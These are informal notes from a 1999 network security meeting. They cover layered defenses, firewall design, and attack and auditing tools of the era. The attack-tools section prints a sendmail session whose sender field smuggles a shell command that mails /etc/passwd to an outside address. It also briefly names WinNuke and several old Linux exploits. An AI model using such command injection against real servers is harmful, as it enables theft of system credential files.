Network Security - December 14, 1999

Here are Eric's slides.

Meeting Notes

Taken by David Kramer

q+a

ns threads

Sun has Kerne threadsm fullyn multiprocessing

very little difference betweek kernel threads and processes under Sun, but they all have the same PID, so they'll all be on one line in ps.

George Peron(?sp) has small luggable pentiums

How can other companies offer DSL to yhou over your existing lines where the phone companyh can't?

Often they lie, and the can't

They offer slower speeds for poorer cables.

Announcements

next meet in 4-370 joint with AIP

Meeting-

Michael Hayes and Eric Cole of Vista Info Securities

eric.cole@vistait.com or eric7095@aol.com

slides will be at http://www.blu.org/meetings/1999/dec/presentation.htm

Lots of F100 companies

pay less for networks and security than for cofee and soft drinks.

hire unknown Y2K experts who may be putting in back doors, and know all the passwords (which the companies typically won't change).

Lots of F100 companies have no security policies, or allow everything outbound.

"Depth of security"- like castles- Always rely on multiple levels of security, some of which are designed merely for detection, some are merly for slowing down attackers.

70% of attacks involve insiders.

AAA

Admin- passwords.

Authorizing- Control who can get to what.

Accounting- Recording who has done what.

Insurance companies may not pay for Y2K or security losses if they can prove you were negligent.

Honeypot- Set up a system that looks like the real system to attract hackers and log heavily.

He says this is a bad idea. Don't attract attention.

NT should never be used as a firewall. The OS itself is not secure enough.

Hardening- removing unwanted services, etc.

(cloud)--[Router]--[Pix fw]--(DMZ/servers)--[Linux fw]-(inside)

Don't put mail server in DMZ. Proxy it to the inside.

There are hacker websites that have the source code for NT, firewall1, Solaris, etc. If the source code could get out, it could be modified and get put back in with back doors.

In Netscape, type link://kramer.ne.mediaone.net to find sites that link to your site.

www.grc.com Gibson Research.

Attack tools

WinNuke- Just type in IP address of Win95/98/NT box and this kills it. Connects to 139 NetBios. It sends out-of-band data that it's not expecting.

l0phtcrack.

sendmail

mail from: "/bin/mail me@host < /etc/passwd"

.. sender ok

rcpt to: mickeymouse

55o unknown user

data

354 enter mail .

Linux exploits

2.2 frag ICMP kernel panic

SDI-pop2 during IMAP anonymous_login() uid is nobody

SDI wu-ftp will let you execute commands as root if you have write access to the server

Sesquipedalian- DOS Linujx 2.1.89-2.2.3: zero-lenght fragment bug.

procrace- linux 2.2.1 contains a /prov race condition allowing local users to crash the kernel.

L2.0.36+ automount allows normal users to gain root via kernel overflow

Tools

Runs on host

IPChains/IPWFAMD

Specific rules first, more general rules later.

IPChains adds

portfw

chains, intricate rules

quality of service routing

ip/port/interface and not (!_

ipfwadm2ipchains

Mason- figures your rules by watching what you do.

netfilter

next gen packet firewalling

check.pl checks file/dir permissions/setuids.

cops (old)

tiger (under devel)

Runs outside

strobe- old port scanning tool

nmap

queso- checks for well-know attacks, not really a port scanner

nessus v.good scanning tools

Saint- like Satan

Cheops checks for OS vulnerabilities

ftpcheck/relaycheck checks for servers that relay

SARA Security Auditor's Research Assistant- like Satan.

BASS Bulk Auditing Security Scanner- Scan several servers.

Detection

tripwire